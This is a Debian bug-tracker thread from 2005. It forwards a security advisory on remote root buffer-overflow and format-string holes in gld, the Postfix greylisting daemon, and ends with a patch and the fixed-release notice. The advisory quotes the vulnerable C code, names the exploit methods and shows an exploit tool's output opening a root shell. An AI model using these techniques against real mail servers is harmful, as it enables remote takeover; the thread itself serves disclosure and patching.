Your message dated Wed, 13 Apr 2005 17:32:03 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#304390: fixed in postfix-gld 1.5-1
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 12 Apr 2005 20:22:31 +0000
>From [EMAIL PROTECTED] Tue Apr 12 13:22:30 2005
Return-path: <[EMAIL PROTECTED]>
Received: from inutil.org (vserver151.vserver151.serverflex.de)
[193.22.164.111]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DLRu2-0003U7-00; Tue, 12 Apr 2005 13:22:30 -0700
Received: from p54893e8f.dip.t-dialin.net ([84.137.62.143]
helo=localhost.localdomain)
by vserver151.vserver151.serverflex.de with esmtpsa
(TLS-1.0:RSA_AES_256_CBC_SHA:32)
(Exim 4.50)
id 1DLRtz-0008I0-De
for [EMAIL PROTECTED]; Tue, 12 Apr 2005 22:22:28 +0200
Received: from jmm by localhost.localdomain with local (Exim 4.50)
id 1DLRtu-0002Ay-BP; Tue, 12 Apr 2005 22:22:22 +0200
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Moritz Muehlenhoff <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: postfix-gld: Multiple remotely exploitable vulnerabilities
X-Mailer: reportbug 3.9
Date: Tue, 12 Apr 2005 22:22:21 +0200
Message-Id: <[EMAIL PROTECTED]>
X-SA-Exim-Connect-IP: 84.137.62.143
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
X-SA-Exim-Scanned: No (on vserver151.vserver151.serverflex.de); SAEximRunCond
expanded to false
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: postfix-gld
Severity: grave
Tags: security
Justification: user security hole
dong-hun you <[EMAIL PROTECTED]> posted a report about several
remotely exploitable security issues to the vuln-watch mailing list.
As I couldn't find a proper WWW reference I'm posting the advisory
verbose.
Cheers,
Moritz
========================================
INetCop Security Advisory #2005-0x82-026
========================================
Title: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
0x01. Description
About:
Gld is a standalone greylisting server for Postfix.
Greylisting is a new weapon to use against spam. For more information on
this technique, see http://www.greylisting.org.
This implementation listens on a TCP port and uses MySQL for storing data.
The server supports whitelists based on sender, sender domain and client IP.
It also supports light greylisting.
URL: http://www.gasmi.net/gld.html
Reference URL: http://www.gasmi.net/down/gld-readme
It's using in FreeBSD port and gentoo, debian.
Reference URL: http://wyae.de/docs/greylisting_on_debian.php
Reference URL: http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/gld/
Reference URL: http://gentoo-portage.com/mail-filter/gld
Reference URL: http://directory.fsf.org/email/spam/gld.html
The program has plenty of remote vulnerabilities.
These vulnerabilities can be used remote user to gain root privilege.
#1) Multi-oveflow vulnerability
This problem happens because of abuse of strcpy() and sprintf() functions
`/gid-1.4/server.c':
--
...
195 int HandleChild(int s,config *cnf)
196 {
197 char buff[BLEN];
198 char request[BLEN];
199 char sender[BLEN];
200 char recipient[BLEN];
201 char ip[BLEN];
...
301 if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
302 {
303 sprintf(buff,"Received invalid data req=(%s) sender=(%s)
recipient=(%s) ip=(%s)",request,sender,recipient,ip); // here
304 if(cnf->syslog==1) ErrorLog(cnf,buff);
305 if(cnf->debug==1) printf("%d: %s\n",pid,buff);
306 return(-2);
307 }
...
--
Remote overflow exploit can be happened by sprintf() and it allows attacker to
gain root privilege.
#2) remote format string -
These vulnerabilities are very easy to be exploited.
gld.conf is supporting syslog() function basically.
Thereby, with problem in next code, it's possible to gain root privilege.
`/gld-1.4/cnf.c':
--
...
117 void ErrorLog(config *conf,char *msg)
118 {
119 #ifdef HAVE_SYSLOG_H
120 openlog("gld",0,conf->facility);
121 syslog(LOG_ALERT,msg); // here
122 closelog();
123 #endif
124 }
...
--
It happens by illegal use of syslog() function.
--
bash-2.04# cat *.c |grep ErrorLog |grep -v void
if(conf.syslog==1) ErrorLog(&conf,"gld started, up and running");
if(cid < 0 && conf.syslog==1) ErrorLog(&conf,"Fork returned
error code, no child");
ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"Read Network error");
if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"MySQL error");
bash-2.04#
--
It can be exploited pretty easily.
And there are alot more sprintf(), strcpy() function overflow vulnerabilities
which are not mentioned.
0x02. Vulnerable Packages
Vendor site: http://www.gasmi.net/gld.html
GLD all version (exploitable)
-gld-1.4.tgz
-gld.1.3.tgz
0x03. Exploit
I made this exploit in RedHat Linux 7.x and 9.x by Proof of Concept code.
There is no plan to develop other platform code.
#1) remote buffer overflow exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 3 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)
# method: jmp *%esp exploit: 254 byte
# send code size: 2200 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[EMAIL PROTECTED] /]# w
#2) remote format string exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 0 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)
# Make format string, .dtors: 0x804d14c
#
# shellcode addr: 0x805506e, size: 320 byte
# send code size: 394 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[EMAIL PROTECTED] /]#
0x04. Patch
GLD 1.4 patch:
=== gld-1.4.patch ===
--- cnf.c 2004-08-18 23:44:22.000000000 +0900
+++ patch/cnf.c 2005-03-06 17:36:04.000000000 +0900
@@ -118,7 +118,7 @@
{
#ifdef HAVE_SYSLOG_H
openlog("gld",0,conf->facility);
-syslog(LOG_ALERT,msg);
+syslog(LOG_ALERT,"%s",msg);
closelog();
#endif
}
--- greylist.c 2004-08-18 04:12:38.000000000 +0900
+++ patch/greylist.c 2005-03-06 17:39:59.000000000 +0900
@@ -20,9 +20,9 @@
pid=getpid();
ts=time(0);
-strcpy(oip,ip);
-strcpy(osender,sender);
-strcpy(orecipient,recipient);
+strncpy(oip,ip,sizeof(oip)-1);
+strncpy(osender,sender,sizeof(osender)-1);
+strncpy(orecipient,recipient,sizeof(orecipient)-1);
if(conf->debug==1) printf("%d: Starting the greylist algo\n",pid);
@@ -52,17 +52,17 @@
if(conf->debug==1) printf("%d: lightgrey on domain is on, let's keep
the domain only on recipient and sender\n",pid);
domain=(char *)strstr(osender,"@");
- if(domain!=NULL) strcpy(sender,domain);
+ if(domain!=NULL) strncpy(sender,domain,BLEN-1);
domain=(char *)strstr(orecipient,"@");
- if(domain!=NULL) strcpy(recipient,domain);
+ if(domain!=NULL) strncpy(recipient,domain,BLEN-1);
}
//
// Do we have this entry in our database ?
//
-sprintf(query,"select first from greylist where ip='%s' and sender='%s' and
recipient='%s'",ip,sender,recipient);
+snprintf(query,sizeof(query)-1,"select first from greylist where ip='%s' and
sender='%s' and recipient='%s'",ip,sender,recipient);
n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
@@ -78,7 +78,7 @@
//
if(conf->lightd==1 && n==0)
{
- sprintf(query,"select first from greylist where ip='%s' and
sender='%s' and recipient='%s'",ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"select first from greylist where
ip='%s' and sender='%s' and recipient='%s'",ip,osender,orecipient);
n=SQLQuery(query);
if(n<0) return(-1);
if(n==0) fneither=1; else fnotdomain=1;
@@ -101,7 +101,7 @@
domain=(char *)strstr(osender,"@");
if(domain==NULL) domain=osender;
- strcpy(netw,oip);
+ strncpy(netw,oip,sizeof(netw)-1);
l=strlen(netw);
for(i=l-1;i>=0;i--)
if(netw[i]=='.')
@@ -111,7 +111,7 @@
}
- sprintf(query,"select count(mail) from whitelist where mail in
('%s','%s','%s','%s')",osender,domain,oip,netw);
+ snprintf(query,sizeof(query)-1,"select count(mail) from whitelist
where mail in ('%s','%s','%s','%s')",osender,domain,oip,netw);
n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
if(n>0)
@@ -130,7 +130,7 @@
x=sscanf(oip,"%d.%d.%d.%d",&a,&b,&c,&d);
if(x==4)
{
- sprintf(query,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
+
snprintf(query,sizeof(query)-1,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
n=DnsIp(query,NULL);
if(conf->debug==1) printf("%d: DNSQuery=(%s)
result=%ld\n",pid,query,n);
if(n==0)
@@ -146,9 +146,9 @@
// was not whitelisted and thus we have to insert it
//
if(conf->lightd==1 && fneither==1)
- sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
- else sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
+ else snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -165,9 +165,9 @@
if(conf->update==1)
{
if(conf->lightd==1 && fnotdomain==1)
- sprintf(query,"update greylist set last=%d,n=n+1 where
ip='%s' and sender='%s' and recipient='%s'",ts,ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"update greylist set
last=%d,n=n+1 where ip='%s' and sender='%s' and
recipient='%s'",ts,ip,osender,orecipient);
- else sprintf(query,"update greylist set last=%d,n=n+1 where
ip='%s' and sender='%s' and recipient='%s'",ts,ip,sender,recipient);
+ else snprintf(query,sizeof(query)-1,"update greylist set
last=%d,n=n+1 where ip='%s' and sender='%s' and
recipient='%s'",ts,ip,sender,recipient);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -180,7 +180,7 @@
if(ts-n>conf->mini && conf->lightd==1 && fnotdomain==1)
{
- sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
if(conf->debug==1) printf("Add the domain triplet for next
time.\n");
SQLQuery(query);
}
--- server.c 2004-08-19 07:57:03.000000000 +0900
+++ patch/server.c 2005-03-06 17:41:52.000000000 +0900
@@ -215,7 +215,7 @@
if(cnf->debug==1) printf("%d: Rejected New incoming connexion from %s
(%s)\n",pid,buff,ip);
if(cnf->syslog==1)
{
- sprintf(buff,"Rejected New incoming connexion from %s
(%s)\n",buff,ip);
+ snprintf(buff,sizeof(buff)-1,"Rejected New incoming connexion
from %s (%s)\n",buff,ip);
ErrorLog(cnf,buff);
}
@@ -262,16 +262,16 @@
if(strcmp(buff,"")==0) break;
if(strncmp(buff,"request=",8)==0)
- strcpy(request,buff+8);
+ strncpy(request,buff+8,sizeof(request)-1);
if(strncmp(buff,"sender=",7)==0)
- strcpy(sender,buff+7);
+ strncpy(sender,buff+7,sizeof(sender)-1);
if(strncmp(buff,"recipient=",10)==0)
- strcpy(recipient,buff+10);
+ strncpy(recipient,buff+10,sizeof(recipient)-1);
if(strncmp(buff,"client_address=",15)==0)
- strcpy(ip,buff+15);
+ strncpy(ip,buff+15,sizeof(ip)-1);
}
@@ -300,7 +300,7 @@
if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
{
- sprintf(buff,"Received invalid data req=(%s) sender=(%s) recipient=(%s)
ip=(%s)",request,sender,recipient,ip);
+ snprintf(buff,sizeof(buff)-1,"Received invalid data req=(%s)
sender=(%s) recipient=(%s) ip=(%s)",request,sender,recipient,ip);
if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->debug==1) printf("%d: %s\n",pid,buff);
return(-2);
@@ -322,7 +322,7 @@
if(n==0)
{
- sprintf(buff,"action=defer_if_permit %s\n\n",cnf->message);
+ snprintf(buff,sizeof(buff)-1,"action=defer_if_permit
%s\n\n",cnf->message);
WriteSocket(s,buff,strlen(buff),TOUT);
if(cnf->syslog==1) Log(cnf,recipient,sender,ip,MSGGREYLIST);
if(cnf->debug==1) printf("%d: Decision is to greylist\n",pid);
=== eof ===
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.11
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)
---------------------------------------
Received: (at 304390-close) by bugs.debian.org; 13 Apr 2005 21:39:09 +0000
>From [EMAIL PROTECTED] Wed Apr 13 14:39:09 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DLpZl-0000YM-00; Wed, 13 Apr 2005 14:39:09 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DLpSt-0008Gx-00; Wed, 13 Apr 2005 17:32:03 -0400
From: Santiago Vila <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#304390: fixed in postfix-gld 1.5-1
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Wed, 13 Apr 2005 17:32:03 -0400
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Source: postfix-gld
Source-Version: 1.5-1
We believe that the bug you reported is fixed in the latest version of
postfix-gld, which is due to be installed in the Debian FTP archive:
postfix-gld_1.5-1.diff.gz
to pool/main/p/postfix-gld/postfix-gld_1.5-1.diff.gz
postfix-gld_1.5-1.dsc
to pool/main/p/postfix-gld/postfix-gld_1.5-1.dsc
postfix-gld_1.5-1_i386.deb
to pool/main/p/postfix-gld/postfix-gld_1.5-1_i386.deb
postfix-gld_1.5.orig.tar.gz
to pool/main/p/postfix-gld/postfix-gld_1.5.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Santiago Vila <[EMAIL PROTECTED]> (supplier of updated postfix-gld package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Wed, 13 Apr 2005 23:05:36 +0200
Source: postfix-gld
Binary: postfix-gld
Architecture: source i386
Version: 1.5-1
Distribution: unstable
Urgency: high
Maintainer: Santiago Vila <[EMAIL PROTECTED]>
Changed-By: Santiago Vila <[EMAIL PROTECTED]>
Description:
postfix-gld - greylisting daemon for postfix, written in C, uses MySQL
Closes: 293824 293829 302267 304390
Changes:
postfix-gld (1.5-1) unstable; urgency=high
.
* New upstream release, fixes lots of security bugs (Closes: #304390).
* Default gld.conf explains how to change return code (Closes: #293829).
Be careful with this, most people do greylisting with defer_if_permit.
* Default is now LOOPBACKONLY=1. Use LOOPBACKONLY=0 only if you need it
(i.e. postfix and gld running in different machines).
* Updated table-whitelist.sql (Closes: #293824).
* Clarified README.Debian (Closes: #302267).
Files:
1b2fbad5c24a52e70077d15a53e75043 571 mail optional postfix-gld_1.5-1.dsc
1f675ff8df2ee69a11f2e363daf5fcf4 39051 mail optional
postfix-gld_1.5.orig.tar.gz
a7164718b358d534126a1aca7af33490 5801 mail optional postfix-gld_1.5-1.diff.gz
6566cdc3cc486e04a2125ce9459f5065 22394 mail optional postfix-gld_1.5-1_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFCXYtId9Uuvj7yPNYRAhyOAKCRgG+a+WEhXYX43qNAfATmVrEbqACeLlsl
HP/cS58ILyHRTPsu0i6TloY=
=oCT7
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
